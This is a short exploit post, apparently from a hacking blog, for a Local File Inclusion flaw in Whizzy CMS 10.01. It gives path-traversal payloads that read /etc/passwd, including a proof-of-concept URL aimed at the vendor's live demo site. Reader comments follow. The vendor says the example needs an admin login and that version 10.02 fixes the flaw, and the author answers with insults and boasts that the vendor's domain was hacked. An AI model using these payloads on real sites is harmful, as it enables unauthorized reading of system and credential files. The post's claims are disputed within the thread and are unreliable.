~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.01
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/?[LFI]
Ex:
http://site.org/?../../../../../../../etc/passwd
PoC on live demo:
http://www.unverse.net/whizzydemo/?../../../../../../../../../../../../etc/passwd
Special Tnx : lun0s, proge, sToRm, progenic, gny
Subscribe to:
Post Comments (Atom)
http://www.exploit-db.com/exploits/14366/ :D
ReplyDeletehttp://inj3ct0r.com/exploits/13344 :)
ReplyDeleteFirst, the example given was wrong - you had to be logged in as an admin user and provide some other stuff in the query string to see the exploit.
ReplyDeleteSecond, this vulnerability is fixed by upgrading to Whizzy CMS 10.02 (or above), available from http://code.google.com/p/whizzy/
Sorry but your wrong jack :P You do not have to be logged in to exploit the lfi, i know cuz i found it and tested it out lots before reporting it. And no shit its fixed dumb ass, after their domain got owned im sure they did everything they could to fix it lol
ReplyDelete